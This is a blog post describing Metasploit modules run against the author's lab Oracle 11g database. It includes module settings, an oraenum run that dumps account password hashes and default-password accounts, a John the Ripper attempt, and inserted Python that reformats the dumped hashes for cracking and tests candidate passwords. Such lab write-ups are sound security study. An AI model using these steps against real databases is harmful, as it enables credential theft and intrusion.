Exploiting an Oracle database with Metasploit (Part 1)

Now that I have a Metasploit and Oracle demo environment, it is time to see what I can use to exploit an Oracle 11g Release 2 database. I have to tell you, most of the exploits are actually rather old. I was a bit disappointed.

When you do “search oracle” in Metasploit, you get a promising, long list of scans and exploits. But as you’ll quickly note, a lot is Java related. Because that’s also Oracle. It helps to do a smarter search, for example by looking up oracle in the name: “search name:oracle”. But this also gives you MySQL exploits. And exploits of every old Oracle version. I’m not looking for that now either. And I’ve tried grepping, but that is not interpreted as grepping and gives you really weird results.

So in the end I’m just giving you my list of Oracle database scans and exploits that do not have old version numbers in the description. All non-database products are removed from the list. And for good measure, I’ve also removed exploits with very old disclosure dates, because I assumed they were targeted at versions much older than Oracle 11g.


Name                                                 Disclosure Date  Rank       Description
----                                                 ---------------  ----       -----------
auxiliary/admin/oracle/ora_ntlm_stealer              2009-04-07       normal     Oracle SMB Relay Code Execution
auxiliary/admin/oracle/oracle_login                  2008-11-20       normal     Oracle Account Discovery
auxiliary/admin/oracle/oracle_sql                    2007-12-07       normal     Oracle SQL Generic Query
auxiliary/admin/oracle/oraenum                                        normal     Oracle Database Enumeration
auxiliary/admin/oracle/post_exploitation/win32exec   2007-12-07       normal     Oracle Java execCommand (Win32)
auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10       normal     Oracle URL Download
auxiliary/admin/oracle/sid_brute                     2009-01-07       normal     Oracle TNS Listener SID Brute Forcer
auxiliary/admin/oracle/tnscmd                        2009-02-01       normal     Oracle TNS Listener Command Issuer
auxiliary/analyze/jtr_oracle_fast                                     normal     John the Ripper Oracle Password Cracker (Fast Mode)
auxiliary/scanner/oracle/emc_sid                                      normal     Oracle Enterprise Manager Control SID Discovery
auxiliary/scanner/oracle/oracle_hashdump                              normal     Oracle Password Hashdump
auxiliary/scanner/oracle/oracle_login                                 normal     Oracle RDBMS Login Utility
auxiliary/scanner/oracle/sid_brute                                    normal     Oracle TNS Listener SID Bruteforce
auxiliary/scanner/oracle/sid_enum                    2009-01-07       normal     Oracle TNS Listener SID Enumeration
auxiliary/scanner/oracle/tnslsnr_version             2009-01-07       normal     Oracle TNS Listener Service Version Query
auxiliary/scanner/oracle/tnspoison_checker           2012-04-18       normal     Oracle TNS Listener Checker
auxiliary/scanner/oracle/xdb_sid                                      normal     Oracle XML DB SID Discovery
auxiliary/scanner/oracle/xdb_sid_brute                                normal     Oracle XML DB SID Discovery via Brute Force
auxiliary/sqli/oracle/jvm_os_code_11g                2010-02-01       normal     Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution
exploit/windows/oracle/client_system_analyzer_upload 2011-01-18       excellent  Oracle Database Client System Analyzer Arbitrary File Upload

So that brings me to actually two exploits, and one is actually targeted at the database client (I left it in there, because where there are databases, there often are clients) and one SQL injection hack that – mind you – actually works. If you are a bit of a hacker (or “good with Internet”), it’s not so difficult to get a DBA role with it. Still, a bit sobering, isn’t it.

I went through the whole list of scans. Here are a few of my experiences.

Password hashes and John the Ripper

I really wanted to try John the Ripper to hack Oracle hashes, but I just did not get it to work. John the Ripper does not run from Metasploit; it is installed on Kali Linux 2 and its executable is just “john”. When running john, it assumes you have written a hashdump somewhere that it can use. No problem, there’s a page about John the Ripper hash formats. So I wrote this line in a text file:

DBSNMP:BA054BE9241074F8437B47B98B9298F6063561403341EA94F595D242183E

Should be compatible, right? Well, apparently not.

root@kali:~# john --format=oracle11 /tmp/orahash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (oracle11, Oracle 11g [SHA1 128/128 AVX 4x])
Illegal instruction

An Oracle 10g hash I wrote to a file got the same result. Okay, before I file a bug report, I’d better try to make a hash dump from my database and see if that gets better results. And maybe I can use that output.

So for that we have auxiliary/scanner/oracle/oracle_hashdump. To run it you need the IP or host of the database server, a SID, and if you’re going to use SCOTT for this, you really need to change the password to lowercase. Also, SCOTT can’t do this exploit by default. You need to give SCOTT the SELECT ANY DICTIONARY privilege. (And this is why you should NEVER give SELECT ANY DICTIONARY privileges: because it gives the user access to your password hashes for one thing.)

msf auxiliary(ora_ntlm_stealer) > use auxiliary/scanner/oracle/oracle_hashdump

The info command is usually more useful than “show options”. Here you see the info after I changed all required values.

msf auxiliary(oracle_hashdump) > info

Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
theLightCosine <theLightCosine@metasploit.com>

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
DBPASS   tiger            yes       The password to authenticate with.
DBUSER   SCOTT            yes       The username to authenticate with.
RHOSTS   192.168.56.163   yes       The target address range or CIDR identifier
RPORT    1521             yes       The TNS port.
SID      KNUTSEL          yes       The sid to authenticate with.
THREADS  1                yes       The number of concurrent threads

Description:
This module dumps the usernames and password hashes from Oracle
given the proper Credentials and SID. These are then stored as creds
for later cracking.

I ran it and..:

msf auxiliary(oracle_hashdump) > run

[*] Server is running 11g, using newer methods...
[-] An error occured. The supplied credentials may not have proper privs
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here is where I got that Han Solo hyperdrive failure feeling. The supplied credentials may not have the proper privs? Well, if I remove SELECT ANY DICTIONARY I get ORA-00942. That’s what you’d expect when you don’t have the proper privs:

msf auxiliary(oracle_hashdump) > run

[*] Server is running 11g, using newer methods...
[*] ORA-00942: table or view does not exist
[-] An error occured. The supplied credentials may not have proper privs
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So I tried to give SCOTT direct select privs on USER$ from SYS. Nope, error. I ran it as SYSTEM. Nope, error. I ran it as SYS… well, actually that wouldn’t work. You have to log in AS SYSDBA, see. So, yeah, this clearly needs a fix. The source code is out there. I’ll see if I can find the bug.


auxiliary/admin/oracle/oraenum

Before you throw the Metasploit towel in the ring, let’s have one that I thought was really interesting: auxiliary/admin/oracle/oraenum by Carlos Perez. You need to give a host IP or name, a SID and – again – if you’re going to use SCOTT for this, you really need to change the password to lowercase. Of course SCOTT needs a couple of extra privileges. SELECT ANY DICTIONARY did the trick nicely (so – again – let that be a warning, rather than an encouragement).

msf auxiliary(oraenum) > info

Name: Oracle Database Enumeration
Module: auxiliary/admin/oracle/oraenum
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Carlos Perez <carlos_perez@darkoperator.com>

Basic options:
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
DBPASS  TIGER            yes       The password to authenticate with.
DBUSER  SCOTT            yes       The username to authenticate with.
RHOST                    yes       The Oracle host.
RPORT   1521             yes       The TNS port.
SID     ORCL             yes       The sid to authenticate with.

Description:
This module provides a simple way to scan an Oracle database server
for configuration parameters that may be useful during a penetration
test. Valid database credentials must be provided for this module to
run.

msf auxiliary(oraenum) > set RHOST 192.168.56.163
RHOST => 192.168.56.163
msf auxiliary(oraenum) > set SID KNUTSEL
SID => KNUTSEL
msf auxiliary(oraenum) > set dbpass tiger
dbpass => tiger
msf auxiliary(oraenum) > run

[*] Running Oracle Enumeration....
[*] The versions of the Components are:
[*]      Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
[*]      PL/SQL Release 11.2.0.1.0 - Production
[*]      CORE     11.2.0.1.0     Production
[*]      TNS for Linux: Version 11.2.0.1.0 - Production
[*]      NLSRTL Version 11.2.0.1.0 - Production
[*] Auditing:
[*]      Database Auditing is enabled!
[*]      Auditing of SYS Operations is not enabled!
[*] Security Settings:
[*]      SQL92 Security restriction on SELECT is not Enabled
[*]      UTL Directory Access is set to
[*]      Audit log is saved at /u01/app/oracle/admin/KNUTSEL/adump
[*] Password Policy:
[*]      Current Account Lockout Time is set to 1
[*]      The Number of Failed Logins before an account is locked is set to 10
[*]      The Password Grace Time is set to 7
[*]      The Lifetime of Passwords is set to 180
[*]      The Number of Times a Password can be reused is set to UNLIMITED
[*]      The Maximum Number of Times a Password needs to be changed before it can be reused is set to UNLIMITED
[*]      The Number of Times a Password can be reused is set to UNLIMITED
[*]      Password Complexity is not checked
[*] Active Accounts on the System in format Username,Password,Spare4 are:
[*]      SYS,03E1E7984F880583,S:3CD57915E74AF162A5ABA3A30FE453E43DF884CB6A552C647B03572BA46D
[*]      SYSTEM,5A7270D7D12F6BA6,S:EDCB23E4039293C352B12D01EA52F2AF3311B5FA744BE3DCC728BDFE0655
[*]      DBSNMP,57E9C5ECCAB1777C,S:D9576CA642448980FB5C04D3869614D572E712BF5E019E02C31BBF300E76
[*]      SYSMAN,CB3E68076FBBAFF5,S:1132C132BFA6686735DEC4398F30DD411F0DDCAAAFCB4AC21527887B7129
[*]      MGMT_VIEW,23C5225CD5C2C782,S:0983A18B9809980B2ABE7A7A4047E5AA3925DC184C92047B6F5404E8CD11
[*]      APP_USER,71B0EFF101D0D5AC,S:13BAA4B46E85969429B3242E64E526292EB15BA071E3AAF37649CD3289BA
[*]      SCOTT,F894844C34402B67,S:7ED8346E4DA9EE29ACBB4A9D08B2E18B57404E6A9A03DB6AF01024BC0B8F
[*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are:
[*]      OUTLN,4A3BA55E08595C81,S:8DF2965A946AB7ED6F6657A99B91CC792B67BF873D7CAFD3B20C98A28370
[*]      DIP,CE4A36B8E06CA59C,S:3E265D395D4D1A637729747CECC8BAD1CD8EFA262A8377E5635BB94434C5
[*]      ORACLE_OCM,5A2E026A9157958C,S:CDC4C09C00C4A8C25DCD1062BF8EC8BCB468841A1C77AB6E65188DF24D99
[*]      APPQOSSYS,519D632B7EE7F63A,S:B388B593D8609871990A15E991C82ACA154B0ADDA84E7CB549CFCC6E9B94
[*]      WMSYS,7C9BA362F8314299,S:A38520037B1C3904B76B3B65E8605DA4F89F710345F60FC7406A3FE9B709
[*]      XS$NULL,DC4FCC8CB69A6733,S:0327C110E72AE2E82F08AACBBBD385E4589FA1386F20119E1EE2A6AC8DC4
[*]      EXFSYS,33C758A8E388DEE5,S:BA1BB1B61AA7FE91BFF3CA99A116C2299F2DA8F87398D5560C20B74EDD00
[*]      XDB,88D8364765FCE6AF,S:7E885EEAC286739730FEDD138F83A361204D96FB92E35FFBDD89A494E32B
[*]      ANONYMOUS,anonymous,
[*]      APEX_PUBLIC_USER,E0781A84AA9234A8,S:934C76C08882384A2C51644F9C8302D40D32BFB83524BC4EC9EB84CA0221
[*]      ORDSYS,7EFA02EC7EA6B86F,S:74C72073718541C8074E24B1210367A6D702C01064580BFF4E5719AD8ECD
[*]      ORDDATA,A93EC937FCD1DC2A,S:C7267CE01C7CDCD0AF39C4289B7C66A3E0E75EAA3DC47D6143984256A9F1
[*]      ORDPLUGINS,88A2B2C183431F00,S:554026F9CFABC573E6A7B439716F69AF45A33D969FE7C16AA2E8CF702E34
[*]      SI_INFORMTN_SCHEMA,84B8CBCA4D477FA3,S:1C2A0B249085C3CEED0B29019231E49F35A56CDB8E0653B1E38E39B5AB8E
[*]      MDSYS,72979A94BAD2AF80,S:FE9431C8FA6CD61C1741389012B7D7B9ABD4213A612286E83E45F3E50A9E
[*]      FLOWS_FILES,110F19A4A024EB24,S:EB5CC126B7E3198814CC1B06065AF0E15259706E4036431D15F809527816
[*]      APEX_030200,A1A70E91605C5567,S:36A4A6B16BC8D55287D3E672FD86D72EA63C3749640A9DD668122E702F1E
[*] Accounts with DBA Privilege  in format Username,Hash on the System are:
[*]      SYS
[*]      APP_USER
[*]      SYSTEM
[*] Accounts with Alter System Privilege on the System are:
[*]      SYS
[*]      DBA
[*]      APEX_030200
[*] Accounts with JAVA ADMIN Privilege on the System are:
[*] Accounts that have CREATE LIBRARY Privilege on the System are:
[*]      SYS
[*]      XDB
[*]      EXFSYS
[*]      MDSYS
[*]      DBA
[*] Default password check:
[*]      The account DIP has a default password.
[*]      The account MDSYS has a default password.
[*]      The account XS$NULL has a default password.
[*]      The account OUTLN has a default password.
[*]      The account EXFSYS has a default password.
[*]      The account ORACLE_OCM has a default password.
[*]      The account SCOTT has a default password.
[*]      The account ORDPLUGINS has a default password.
[*]      The account ORDSYS has a default password.
[*]      The account APPQOSSYS has a default password.
[*]      The account ORDDATA has a default password.
[*]      The account XDB has a default password.
[*]      The account SI_INFORMTN_SCHEMA has a default password.
[*]      The account WMSYS has a default password.
[*] Auxiliary module execution completed

Well, that was pretty cool. Password hashes anyone? Default password checks? Checks on auditing. Very nifty.
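To tie the oraenum output above back to the John the Ripper attempt earlier in the post: an 11g verifier in the Spare4 column is "S:" followed by 60 hex digits, the first 40 being SHA-1 over the password bytes and a 10-byte salt, the last 20 being that salt. The snippet below (added here as an example, not code from the post or from Metasploit) parses oraenum's "Username,Password,Spare4" lines into the USER:hash layout the post fed to john --format=oracle11, and checks a single candidate against a verifier the way a default-password audit does; the sample lines and the salt in the test are constructed.

```python
import hashlib
import re

# Constructed sample in the "Username,Password,Spare4" layout oraenum prints.
# The SCOTT line is copied from the module output above; ANONYMOUS has no
# 11g verifier, so it must be skipped.
SAMPLE_ORAENUM = """\
[*]      SCOTT,F894844C34402B67,S:7ED8346E4DA9EE29ACBB4A9D08B2E18B57404E6A9A03DB6AF01024BC0B8F
[*]      ANONYMOUS,anonymous,
"""

# Username (may contain $, e.g. XS$NULL), legacy 10g hash, 11g Spare4 value.
LINE_RE = re.compile(r"^\[\*\]\s+(?P<user>[A-Z0-9_$#]+),(?P<pwd>[^,]*),(?P<spare4>.*)$")


def oracle11_hash(password, salt):
    """Build an 11g verifier: 'S:' + hex(SHA1(password || salt)) + hex(salt)."""
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest().upper()
    return "S:" + digest + salt.hex().upper()


def split_spare4(spare4):
    """Return (digest_hex, salt_bytes) for an 11g verifier, else None."""
    if not spare4.startswith("S:") or len(spare4) != 62:
        return None
    body = spare4[2:]
    if not re.fullmatch(r"[0-9A-Fa-f]{60}", body):
        return None
    return body[:40].upper(), bytes.fromhex(body[40:])


def check_password(spare4, candidate):
    """True when candidate reproduces the stored verifier (default/weak
    password audit, the same idea as oraenum's default password check)."""
    parsed = split_spare4(spare4)
    if parsed is None:
        return False
    digest, salt = parsed
    return hashlib.sha1(candidate.encode("utf-8") + salt).hexdigest().upper() == digest


def to_john_oracle11(output):
    """Turn oraenum account lines into 'USER:hash' lines (without the 'S:'
    prefix, matching the file layout used with john --format=oracle11)."""
    lines = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m or split_spare4(m["spare4"]) is None:
            continue
        lines.append(f"{m['user']}:{m['spare4'][2:]}")
    return lines
```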

Next blogpost: TNS poisoning and brute force SID enumerations.

About Marcel-Jan Krijgsman

Ever since I started working with Oracle, I had an interest in Oracle database performance tuning. This led, eventually, to a four day training I made and gave for customers of Transfer Solutions. Since 2012 I work for Rabobank Nederland. A few years ago I also became interested in Oracle database security. All technology aside, it is my experience that security usually plays out on a political level. I'm a Oracle certified professional for the 8i, 9i, 10g and 11g databases and Oracle Database 11g Performance Tuning Certified Expert.